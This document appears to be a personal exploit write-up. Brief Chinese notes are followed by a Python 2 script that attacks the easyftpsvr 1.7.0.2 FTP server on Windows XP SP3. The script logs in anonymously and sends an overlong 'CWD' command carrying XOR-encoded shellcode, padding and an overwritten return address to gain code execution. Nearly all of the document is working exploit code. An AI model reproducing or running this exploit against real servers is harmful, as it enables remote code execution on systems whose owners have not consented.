程序是FTP软件
分析登陆发包情况
然后发送 'CWD XXXXXX' 造成溢出
熟悉 FTP命令!!
程序也有检测字符···
还不是很清楚 为什么 弹框没有显示字···························
环境 : XP SP3 中文
easyftpsvr-1.7.0.2
import socket,sys def ftp_test(ip,port): target = ip port = port shellcode = ('\x50\x20' '\xD9\xEE' '\xD9\x74\x24\xF4' '\x58' '\x83\xC0\x1b' '\x33\xC9' '\x8A\x1C\x08' '\x80\xF3\x11' '\x88\x1C\x08' '\x41' '\x80\xFB\x90' '\x75\xF1' '\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d' '\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42' '\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a' '\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84' '\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48' '\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b' '\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64' '\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12' '\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca' '\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41' '\x42\xee\x46\xed\x42\xee\x46\xe9\x81')#198 buffer = shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d' #7D5F6FA0 59 pop ecx s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect = s.connect((target,port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) h = s.recv(1024) print h s.send('USER anonymous\r\n') h = s.recv(1024) print h s.send('PASS anonymous\r\n') h = s.recv(1024) print h print "[+] Sending buffer" s.send('CWD '+ buffer + '\r\n') try: h = s.recv(1024) print h print "failed" except: print "ok" if __name__ == '__main__': ftp_test('127.0.0.1',21)